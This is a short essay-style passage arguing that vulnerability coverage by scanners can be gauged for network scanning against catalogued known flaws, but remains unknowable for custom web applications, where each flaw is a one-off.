In network scanning the list of “well-known” vulnerabilities is large, but also finite. Databases such as OSVDB, SecurityFocus, MITRE (CVE), and others catalog the known universe of issues. Vulnerability coverage by network scanners is likely close to 100%. In “custom” web applications the luxury of well-known vulnerabilities or database repositories vanishes. Each new vulnerability identified is more or less a one-off / zero-day issue. Just as with bugs in application code, we truly never know how many vulnerabilities exist in a web bank, e-commerce store, payroll system, or any other custom web application. The upper bound is unknown. Therefore we can never know for sure if any scan/assessment found them all. Vulnerability coverage could be as low as 10-20% or as high as 80-90% or more. The point is we don’t know; it’s difficult to measure, and it changes with each website.